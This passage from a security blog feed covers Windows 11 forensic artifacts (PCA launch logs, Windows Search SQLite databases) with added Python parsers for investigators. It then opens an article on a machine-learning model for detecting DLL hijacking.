  1116. <li>Company name (from the PE header, lowercase)</li>
  1117. <li>Product version (from the PE header)</li>
  1118. <li>Windows application ID (format matches that used in <a href="https://securelist.com/amcache-forensic-artifact/117622/" target="_blank" rel="noopener">AmCache</a>)</li>
  1119. <li>Message</li>
  1120. </ul>
  1121. </li>
  1122. </ul>
  1123. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117685" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5.png" alt="" width="2390" height="341" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5.png 2390w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5-300x43.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5-1024x146.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5-768x110.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5-1536x219.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5-2048x292.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5-740x106.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5-1600x228.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102803/forensic-artifacts5-800x114.png 800w" sizes="auto, (max-width: 2390px) 100vw, 2390px" /></a></p>
  1124. <p>Note that these text files only record data related to program launches executed through Windows File Explorer. They do not log launches of executable files initiated from the console.</p>
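<p>The following parser is an added example written for this page, not code from the article or from Kaspersky. It follows the record layouts described above (pipe-delimited fields, UTC timestamps as YYYY-MM-DD HH:MM:SS.f, CP-1252 for <code>PcaAppLaunchDic.txt</code>, UTF-16LE for <code>PcaGeneralDb0.txt</code>/<code>PcaGeneralDb1.txt</code>), merges the two alternating Db files into one timeline, and flags launches from user-writable locations. The sample lines, the app ID placeholder and the "user-writable path" heuristic are constructed for illustration.</p>

```python
"""Parse the Windows 11 Program Compatibility Assistant (PCA) text logs.

Added example, not code from the Securelist article. Record layouts follow the
article's description; the sample lines and the user-writable-path heuristic are
this example's own constructions.
"""
from dataclasses import dataclass
from datetime import datetime, timezone
from pathlib import Path

PCA_DIR = r"C:\Windows\appcompat\pca"

# Record types of PcaGeneralDb*.txt as listed in the article
RECORD_TYPES = {
    0: "installation error",
    1: "driver blocked",
    2: "abnormal process exit",
    3: "PCA Resolve call",
    4: "value not set",
}

# Path fragments that usually mean a user-writable location (heuristic, an assumption of this example)
USER_WRITABLE_MARKERS = ("\\users\\", "%userprofile%", "%temp%", "%appdata%",
                         "%localappdata%", "\\temp\\", "\\downloads\\", "\\public\\")


@dataclass
class LaunchRecord:
    last_launch: datetime
    path: str


@dataclass
class GeneralRecord:
    time: datetime
    record_type: int
    path: str
    product: str
    company: str
    version: str
    app_id: str
    message: str
    source: str  # which of the two alternating files the line came from


def parse_pca_time(value: str) -> datetime:
    """'2025-10-10 08:15:42.1' -> timezone-aware UTC datetime (%f accepts 1 to 6 digits)."""
    return datetime.strptime(value.strip(), "%Y-%m-%d %H:%M:%S.%f").replace(tzinfo=timezone.utc)


def parse_app_launch_dic(text: str) -> list[LaunchRecord]:
    """One line per executable: <last launch time>|<full path>. Malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        ts, sep, path = line.partition("|")
        if not sep or not path:
            continue
        try:
            records.append(LaunchRecord(parse_pca_time(ts), path))
        except ValueError:
            continue  # e.g. a line damaged by the CP-1252 issue described in the text
    return records


def parse_general_db(text: str, source: str) -> list[GeneralRecord]:
    """Fields: time|type|path|product|company|version|app id|message (the message may contain '|')."""
    records = []
    for line in text.splitlines():
        fields = line.split("|", 7)
        if len(fields) < 8:
            continue
        try:
            records.append(GeneralRecord(parse_pca_time(fields[0]), int(fields[1]),
                                         *fields[2:7], fields[7], source))
        except ValueError:
            continue
    return records


def read_utf16le(path: Path) -> str:
    """Decode UTF-16LE, dropping a byte-order mark if one is present."""
    data = path.read_bytes()
    if data.startswith(b"\xff\xfe"):
        data = data[2:]
    return data.decode("utf-16-le", errors="replace")


def load_pca_dir(directory: str = PCA_DIR) -> tuple[list[LaunchRecord], list[GeneralRecord]]:
    """Read a collected PCA directory and merge the two alternating Db files into one timeline."""
    d = Path(directory)
    launches = parse_app_launch_dic((d / "PcaAppLaunchDic.txt").read_text(encoding="cp1252", errors="replace"))
    general = []
    for name in ("PcaGeneralDb0.txt", "PcaGeneralDb1.txt"):
        if (d / name).exists():
            general.extend(parse_general_db(read_utf16le(d / name), name))
    general.sort(key=lambda r: r.time)
    return launches, general


def is_user_writable_path(path: str) -> bool:
    """True for launches from profile/temp/download-style locations, which deserve a second look."""
    low = path.lower()
    return any(marker in low for marker in USER_WRITABLE_MARKERS)


def triage(launches, general):
    """Return (path, time, reason) triples worth an analyst's attention, oldest first."""
    hits = [(r.path, r.last_launch, "launched from user-writable location")
            for r in launches if is_user_writable_path(r.path)]
    hits += [(r.path, r.time, RECORD_TYPES.get(r.record_type, "unknown type"))
             for r in general if r.record_type == 2]
    return sorted(hits, key=lambda h: h[1])


# Constructed sample data (not from a real host); the app id is a placeholder
SAMPLE_LAUNCH_DIC = (
    "2025-10-09 13:02:11.5|C:\\Program Files\\7-Zip\\7zFM.exe\n"
    "2025-10-10 08:15:42.1|C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe\n"
)
SAMPLE_GENERAL_DB = (
    "2025-10-10 08:15:43.0|2|%USERPROFILE%\\appdata\\local\\temp\\update.exe|"
    "update helper|contoso ltd|1.0.0.0|APPID-PLACEHOLDER|Abnormal process exit\n"
)

if __name__ == "__main__":
    for path, when, reason in triage(parse_app_launch_dic(SAMPLE_LAUNCH_DIC),
                                     parse_general_db(SAMPLE_GENERAL_DB, "PcaGeneralDb0.txt")):
        print(when.isoformat(), reason, path, sep="  ")
```

<p>On a real case, point <code>load_pca_dir()</code> at the collected <code>appcompat\pca</code> folder; sorting the merged Db records by timestamp restores the single timeline that the two-file rotation splits apart.</p>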
  1125. <h3 id="windows-search">Windows Search</h3>
  1126. <p>Windows Search is the built-in indexing and file search mechanism within Windows. Initially, it combed through files directly, resulting in sluggish and inefficient searches. Later, a separate application emerged that created a fast file index. It was not until 2006&#8217;s Windows Vista that a search feature was fully integrated into the operating system, with file indexing moved to a background process.</p>
  1127. <p>From Windows Vista up to and including Windows 10, the file index was stored in an Extensible Storage Engine (ESE) database:<br />
  1128. <code>%PROGRAMDATA%\Microsoft\Search\Data\Applications\Windows\Windows.edb</code>.</p>
  1129. <p>Windows 11 breaks this storage down into three SQLite databases:</p>
  1130. <ul>
  1131. <li><code>%PROGRAMDATA%\Microsoft\Search\Data\Applications\Windows\Windows-gather.db</code> contains general information about indexed files and folders. The most interesting element is the SystemIndex_Gthr table, which stores data such as the name of the indexed file or directory (FileName column), the last modification of the indexed file or directory (LastModified), an identifier used to link to the parent object (ScopeID), and a unique identifier for the file or directory itself (DocumentID). Using the ScopeID and the SystemIndex_GthrPth table, investigators can reconstruct the full path to a file on the system. The SystemIndex_GthrPth table contains the folder name (Name column), the directory identifier (Scope), and the parent directory identifier (Parent). By matching the file&#8217;s ScopeID with the directory&#8217;s Scope, one can determine the parent directory of the file.</li>
  1132. <li><code>%PROGRAMDATA%\Microsoft\Search\Data\Applications\Windows\Windows.db</code> stores information about the metadata of indexed files. The SystemIndex_1_PropertyStore table is of interest for analysis; it holds the unique identifier of the indexed object (WorkId column), the metadata type (ColumnId), and the metadata itself. Metadata types are described in the SystemIndex_1_PropertyStore_Metadata table (where the content of the Id column corresponds to the ColumnId content from SystemIndex_1_PropertyStore) and are specified in the UniqueKey column.</li>
  1133. <li><code>%PROGRAMDATA%\Microsoft\Search\Data\Applications\Windows\Windows-usn.db</code> does not contain useful information for forensic analysis.</li>
  1134. </ul>
  1135. <p>As depicted in the image below, analyzing the <code>Windows-gather.db</code> file using DB Browser for SQLite can provide us evidence of the presence of certain files (e.g., malware files, configuration files, files created and left by attackers, and others).<br />
  1136. <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6.png" alt="" width="1234" height="667" class="aligncenter size-full wp-image-117735" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6.png 1234w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6-300x162.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6-1024x553.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6-768x415.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6-648x350.png 648w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6-740x400.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6-518x280.png 518w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064945/forensic-artifacts-6-800x432.png 800w" sizes="auto, (max-width: 1234px) 100vw, 1234px" /></a><br />
It is worth noting that the LastModified column is stored in the Windows FILETIME format: an unsigned 64-bit value holding the number of 100-nanosecond intervals since 00:00 on January 1, 1601 (UTC). Using a utility such as DCode, we can see this value in UTC, as shown in the image below.<br />
  1138. <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7.png" alt="" width="1062" height="434" class="aligncenter size-full wp-image-117736" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7.png 1062w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7-300x123.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7-1024x418.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7-768x314.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7-856x350.png 856w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7-740x302.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7-685x280.png 685w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14064958/forensic-artifacts-7-800x327.png 800w" sizes="auto, (max-width: 1062px) 100vw, 1062px" /></a></p>
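<p>The script below is an added example for this page, not code from the article. It models in memory only the columns named above for <code>SystemIndex_Gthr</code> (DocumentID, ScopeID, FileName, LastModified) and <code>SystemIndex_GthrPth</code> (Scope, Parent, Name), walks the Scope/Parent chain to rebuild full paths, converts FILETIME values to UTC, and lists indexed files with executable-looking extensions. Assumptions: the real tables carry more columns than modelled here, roots are represented as Parent = 0 with no separators in Name, and LastModified is accepted either as an integer or as an 8-byte little-endian blob because the article states only that it is a FILETIME, not how SQLite stores it. All rows are constructed.</p>

```python
"""Reconstruct file paths and timestamps from Windows 11's Windows-gather.db.

Added example, not from the Securelist article. Schema is a reduced model of the
tables described in the text; root-scope convention and LastModified storage type
are assumptions; all rows are constructed.
"""
import sqlite3
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
INTERESTING_SUFFIXES = (".exe", ".dll", ".bat", ".cmd", ".ps1", ".vbs", ".js")


def filetime_to_datetime(value) -> datetime:
    """FILETIME: 100-ns ticks since 1601-01-01 00:00 UTC (what DCode labels 'Windows 64-bit')."""
    if isinstance(value, (bytes, bytearray, memoryview)):
        value = struct.unpack("<Q", bytes(value)[:8])[0]
    return FILETIME_EPOCH + timedelta(microseconds=value // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Integer arithmetic only; converting through float seconds would lose the low digits."""
    td = dt.astimezone(timezone.utc) - FILETIME_EPOCH
    return ((td.days * 86400 + td.seconds) * 10**6 + td.microseconds) * 10


# Walk the scope tree from the roots down, then join each file to its scope.
PATH_QUERY = r"""
WITH RECURSIVE chain(scope, path) AS (
    SELECT Scope, Name FROM SystemIndex_GthrPth WHERE Parent = 0
    UNION ALL
    SELECT p.Scope, chain.path || '\' || p.Name
    FROM SystemIndex_GthrPth AS p JOIN chain ON p.Parent = chain.scope
)
SELECT g.DocumentID, chain.path || '\' || g.FileName, g.LastModified
FROM SystemIndex_Gthr AS g JOIN chain ON g.ScopeID = chain.scope
ORDER BY g.DocumentID
"""


def reconstruct_paths(conn: sqlite3.Connection) -> list[tuple[int, str, datetime]]:
    """(DocumentID, full path, LastModified as UTC datetime) for every indexed file."""
    return [(doc_id, path, filetime_to_datetime(lm)) for doc_id, path, lm in conn.execute(PATH_QUERY)]


def find_interesting(conn, suffixes=INTERESTING_SUFFIXES):
    """Indexed files whose extension suggests code: the 'files left by attackers' case in the text."""
    return [row for row in reconstruct_paths(conn) if row[1].lower().endswith(suffixes)]


def build_sample_db() -> sqlite3.Connection:
    """Constructed stand-in for a collected Windows-gather.db."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE SystemIndex_GthrPth (Scope INTEGER PRIMARY KEY, Parent INTEGER, Name TEXT);
        CREATE TABLE SystemIndex_Gthr (DocumentID INTEGER PRIMARY KEY, ScopeID INTEGER,
                                       FileName TEXT, LastModified BLOB);
    """)
    conn.executemany("INSERT INTO SystemIndex_GthrPth VALUES (?, ?, ?)", [
        (1, 0, "C:"), (2, 1, "Users"), (3, 2, "alice"), (4, 3, "Downloads"),
        (5, 1, "Windows"), (6, 5, "Temp"),
    ])
    t0 = datetime(2025, 10, 10, 8, 15, 42, tzinfo=timezone.utc)
    conn.executemany("INSERT INTO SystemIndex_Gthr VALUES (?, ?, ?, ?)", [
        (101, 4, "invoice.pdf", datetime_to_filetime(t0)),                                    # INTEGER
        (102, 4, "update.exe", struct.pack("<Q", datetime_to_filetime(t0 + timedelta(minutes=3)))),  # BLOB
        (103, 6, "svc.bat", datetime_to_filetime(t0 + timedelta(hours=1))),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_sample_db()  # on a real case: sqlite3.connect(path_to_collected_Windows_gather_db)
    for doc_id, path, modified in find_interesting(db):
        print(doc_id, modified.isoformat(), path)
```

<p>Work on a copy of the database taken from the image rather than the live file, since the indexer keeps it open; the recursive query does the same ScopeID-to-Scope matching described above, just for every row at once.</p>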
  1139. <h3 id="other-minor-changes-in-windows-11">Other minor changes in Windows 11</h3>
  1140. <p>It is also worth mentioning a few small but important changes in Windows 11 that do not require a detailed analysis:</p>
  1141. <ul>
<li>Windows 11 (from version 24H2) removes support for NTLMv1. Note that this alone does not make pass-the-hash a thing of the past: NTLMv2 still authenticates with the same NT hash, so the technique remains viable wherever NTLM of any version is accepted, and it is the broader deprecation of NTLM in favor of Kerberos that will eventually retire it.</li>
<li>Removal of the well-known Windows 10 Timeline activity artifact. Although the feature is no longer maintained, its database, which holds user activity records, remains for now at <code>%userprofile%\AppData\Local\ConnectedDevicesPlatform\ActivitiesCache.db</code>.</li>
  1144. <li>Similarly, Windows 11 removed Cortana and Internet Explorer, but the artifacts of these can still be found in the operating system. This may be useful for investigations conducted in machines that were updated from Windows 10 to the newer version.</li>
  1145. <li><a href="https://github.com/AndrewRathbun/Windows11Research/tree/main/EventLogs/4624" target="_blank">Previous research</a> also showed that Event ID 4624, which logs successful logon attempts in Windows, remained largely consistent across versions until a notable update appeared in Windows 11 Pro (22H2). This version introduces a new field, called Remote Credential Guard, marking a subtle but potentially important change in forensic analysis. While its real-world use and forensic significance remain to be observed, its presence suggests Microsoft&#8217;s ongoing efforts to enhance authentication-related telemetry.</li>
  1146. <li>Expanded support for the ReFS file system. The latest Windows 11 update preview made it possible to install the operating system directly onto a ReFS volume, and BitLocker support was also introduced. This file system has several key differences from the familiar NTFS:
  1147. <ul>
  1148. <li>ReFS does not have the $MFT (Master File Table) that forensics specialists rely on, which contains all current file records on the disk.</li>
  1149. <li>It does not generate short file names, as NTFS does for DOS compatibility.</li>
  1150. <li>It does not support hard links or extended object attributes.</li>
  1151. <li>It offers increased maximum volume and single-file sizes (35 PB compared to 256 TB in NTFS).</li>
  1152. </ul>
  1153. </li>
  1154. </ul>
  1155. <h2 id="conclusion">Conclusion</h2>
<p>This post provided a brief overview of key changes to Windows 11 artifacts that are relevant to forensic analysis, most notably the new PCA log files and the move of the Windows Search index to SQLite databases. The ultimate utility of these artifacts in investigations remains to be seen. Nevertheless, we recommend that you add the files listed above to the scope of your triage collection tool right away.</p>
  1157. ]]></content:encoded>
  1158. <wfw:commentRss>https://securelist.com/forensic-artifacts-in-windows-11/117680/feed/</wfw:commentRss>
  1159. <slash:comments>0</slash:comments>
  1160. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13154941/SL-forensic-artifacts-in-windows-11-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
  1161. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13154941/SL-forensic-artifacts-in-windows-11-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  1162. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13154941/SL-forensic-artifacts-in-windows-11-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  1163. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13154941/SL-forensic-artifacts-in-windows-11-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1164. </item>
  1165. <item>
  1166. <title>How we trained an ML model to detect DLL hijacking</title>
  1167. <link>https://securelist.com/building-ml-model-to-detect-dll-hijacking/117565/</link>
  1168. <comments>https://securelist.com/building-ml-model-to-detect-dll-hijacking/117565/#respond</comments>
  1169. <dc:creator><![CDATA[Anna Pidzhakova]]></dc:creator>
  1170. <pubDate>Mon, 06 Oct 2025 08:00:21 +0000</pubDate>
  1171. <category><![CDATA[Research]]></category>
  1172. <category><![CDATA[Security technology]]></category>
  1173. <category><![CDATA[Machine learning]]></category>
  1174. <category><![CDATA[DLL hijacking]]></category>
  1175. <category><![CDATA[Threat hunting]]></category>
  1176. <category><![CDATA[Artificial intelligence]]></category>
  1177. <category><![CDATA[DLL]]></category>
  1178. <category><![CDATA[Cybersecurity]]></category>
  1179. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117565</guid>
  1180.  
  1181. <description><![CDATA[An expert at the Kaspersky AI expertise center explains how the team developed a machine-learning model to identify DLL hijacking attacks.]]></description>
  1182. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30133010/SL-ML-model-training-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>DLL hijacking is a common technique in which attackers replace a library called by a legitimate process with a malicious one. It is used by both creators of mass-impact malware, like stealers and banking Trojans, and by APT and cybercrime groups behind targeted attacks. In recent years, the number of DLL hijacking attacks has grown significantly.</p>
  1183. <div class="js-infogram-embed" data-id="_/re1cVhfDkiTvQdIHwndC" data-type="interactive" data-title="01(2)_EN_RU_ES_PT-BR_DLL Hijacking charts" style="min-height:;"></div>
  1184. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Trend in the number of DLL hijacking attacks. 2023 data is taken as 100% (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/02132719/012en_ru_es_pt-br_dll-hijacking-charts.png" target="_blank" rel="noopener">download</a>)</em></p>
  1185. <p>We have observed this technique and its variations, like DLL sideloading, in targeted attacks on organizations in <a href="https://securelist.com/cobalt-strike-attacks-using-quora-github-social-media/117085/" target="_blank" rel="noopener">Russia</a>, <a href="https://securelist.com/apt41-in-africa/116986/" target="_blank" rel="noopener">Africa</a>, <a href="https://securelist.com/operation-synchole-watering-hole-attacks-by-lazarus/116326/" target="_blank" rel="noopener">South Korea</a>, and other countries and regions. <a href="https://securelist.com/lumma-fake-captcha-attacks-analysis/116274/" target="_blank" rel="noopener">Lumma</a>, one of 2025&#8217;s most active stealers, uses this method for distribution. Threat actors trying to profit from popular applications, such as DeepSeek, also <a href="https://securelist.com/backdoors-and-stealers-prey-on-deepseek-and-grok/115801/#scheme-3-backdoors-and-attacks-on-chinese-users" target="_blank" rel="noopener">resort</a> to DLL hijacking.</p>
<p>Detecting a DLL substitution attack is not easy because the library executes within the address space of a legitimate, trusted process, so to a security solution its activity can look like ordinary behavior of that process. Directing excessive attention to trusted processes can compromise overall system performance, so you have to strike a delicate balance between a sufficient level of security and sufficient convenience.</p>
  1187. <h2 id="detecting-dll-hijacking-with-a-machine-learning-model">Detecting DLL hijacking with a machine-learning model</h2>
  1188. <p>Artificial intelligence can help where simple detection algorithms fall short. Kaspersky has been using machine learning for 20 years to identify malicious activity at various stages. The AI expertise center researches the capabilities of different models in threat detection, then trains and implements them. Our colleagues at the threat intelligence center approached us with a question of whether machine learning could be used to detect DLL hijacking, and more importantly, whether it would help improve detection accuracy.</p>
  1189. <h3 id="preparation">Preparation</h3>
  1190. <p>To determine if we could train a model to distinguish between malicious and legitimate library loads, we first needed to define a set of features highly indicative of DLL hijacking. We identified the following key features:</p>
  1191. <ul>
  1192. <li><strong>Wrong library location.</strong> Many standard libraries reside in standard directories, while a malicious DLL is often found in an unusual location, such as the same folder as the executable that calls it.</li>
<li><strong>Wrong executable location.</strong> Attackers often save executables in non-standard paths, like temporary directories or user folders, instead of <code>%ProgramFiles%</code>.</li>
  1194. <li><strong>Renamed executable.</strong> To avoid detection, attackers frequently save legitimate applications under arbitrary names.</li>
  1195. <li><strong>Library size has changed, and it is no longer signed.</strong></li>
  1196. <li><strong>Modified library structure.</strong></li>
  1197. </ul>
  1198. <h3 id="training-sample-and-labeling">Training sample and labeling</h3>
  1199. <p>For the training sample, we used dynamic library load data provided by our internal automatic processing systems, which handle millions of files every day, and anonymized telemetry, such as that voluntarily provided by Kaspersky users through Kaspersky Security Network.</p>
  1200. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220803/dll-hijackingEN2.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117583" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220803/dll-hijackingEN2.png" alt="" width="644" height="470" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220803/dll-hijackingEN2.png 644w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220803/dll-hijackingEN2-300x219.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220803/dll-hijackingEN2-480x350.png 480w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220803/dll-hijackingEN2-384x280.png 384w" sizes="auto, (max-width: 644px) 100vw, 644px" /></a></p>
  1201. <p>The training sample was labeled in three iterations. Initially, we could not automatically pull event labeling from our analysts that indicated whether an event was a DLL hijacking attack. So, we used data from our databases containing only file reputation, and labeled the rest of the data manually. We labeled as DLL hijacking those library-call events where the process was definitively legitimate but the DLL was definitively malicious. However, this labeling was not enough because some processes, like &#8220;svchost&#8221;, are designed mainly to load various libraries. As a result, the model we trained on this data had a high rate of false positives and was not practical for real-world use.</p>
  1202. <p>In the next iteration, we additionally filtered malicious libraries by family, keeping only those which were known to exhibit DLL-hijacking behavior. The model trained on this refined data showed significantly better accuracy and essentially confirmed our hypothesis that we could use machine learning to detect this type of attacks.</p>
<p>At this stage, our training dataset had tens of millions of library load events: about 20 million clean ones (roughly 250,000 unique files) and around 50,000 definitively malicious ones (roughly 1,000 unique files), plus about 18 million events of unknown status.</p>
  1204. <table>
  1205. <tbody>
  1206. <tr>
  1207. <td><strong>Status</strong></td>
  1208. <td><strong>Total</strong></td>
  1209. <td><strong>Unique files</strong></td>
  1210. </tr>
  1211. <tr>
  1212. <td>Unknown</td>
  1213. <td>~ 18M</td>
  1214. <td>~ 6M</td>
  1215. </tr>
  1216. <tr>
  1217. <td>Malicious</td>
  1218. <td>~ 50K</td>
  1219. <td>~ 1,000</td>
  1220. </tr>
  1221. <tr>
  1222. <td>Clean</td>
  1223. <td>~ 20M</td>
  1224. <td>~ 250K</td>
  1225. </tr>
  1226. </tbody>
  1227. </table>
  1228. <p>We then trained subsequent models on the results of their predecessors, which had been verified and further labeled by analysts. This process significantly increased the efficiency of our training.</p>
  1229. <h2 id="loading-dlls-what-does-normal-look-like">Loading DLLs: what does normal look like?</h2>
  1230. <p>So, we had a labeled sample with a large number of library loading events from various processes. How can we describe a &#8220;clean&#8221; library? Using a process name + library name combination does not account for renamed processes. Besides, a legitimate user, not just an attacker, can rename a process. If we used the process hash instead of the name, we would solve the renaming problem, but then every version of the same library would be treated as a separate library. We ultimately settled on using a library name + process signature combination. While this approach considers all identically named libraries from a single vendor as one, it generally produces a more or less realistic picture.</p>
  1231. <p>To describe safe library loading events, we used a set of counters that included information about the processes (the frequency of a specific process name for a file with a given hash, the frequency of a specific file path for a file with that hash, and so on), information about the libraries (the frequency of a specific path for that library, the percentage of legitimate launches, and so on), and event properties (that is, whether the library is in the same directory as the file that calls it).</p>
  1232. <p>The result was a system with multiple aggregates (sets of counters and keys) that could describe an input event. These aggregates can contain a single key (e.g., a DLL&#8217;s hash sum) or multiple keys (e.g., a process&#8217;s hash sum + process signature). Based on these aggregates, we can derive a set of features that describe the library loading event. The diagram below provides examples of how these features are derived:</p>
  1233. <div id="attachment_117584" style="width: 1468px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117584" class="size-full wp-image-117584" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3.png" alt="Feature extraction from aggregates" width="1458" height="546" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3.png 1458w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3-300x112.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3-1024x383.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3-768x288.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3-935x350.png 935w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3-740x277.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3-748x280.png 748w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220906/dll-hijackingEN3-800x300.png 800w" sizes="auto, (max-width: 1458px) 100vw, 1458px" /></a><p id="caption-attachment-117584" class="wp-caption-text">Feature extraction from aggregates</p></div>
  1234. <h2 id="loading-dlls-how-to-describe-hijacking">Loading DLLs: how to describe hijacking</h2>
  1235. <p>Certain feature combinations (dependencies) strongly indicate DLL hijacking. These can be simple dependencies. For some processes, the clean library they call always resides in a separate folder, while the malicious one is most often placed in the process folder.</p>
  1236. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220953/dll-hijackingEN4.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117585" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220953/dll-hijackingEN4.png" alt="" width="1264" height="278" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220953/dll-hijackingEN4.png 1264w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220953/dll-hijackingEN4-300x66.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220953/dll-hijackingEN4-1024x225.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220953/dll-hijackingEN4-768x169.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220953/dll-hijackingEN4-740x163.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28220953/dll-hijackingEN4-800x176.png 800w" sizes="auto, (max-width: 1264px) 100vw, 1264px" /></a></p>
  1237. <p>Other dependencies can be more complex and require several conditions to be met. For example, a process renaming itself does not, on its own, indicate DLL hijacking. However, if the new name appears in the data stream for the first time, and the library is located on a non-standard path, it is highly likely to be malicious.</p>
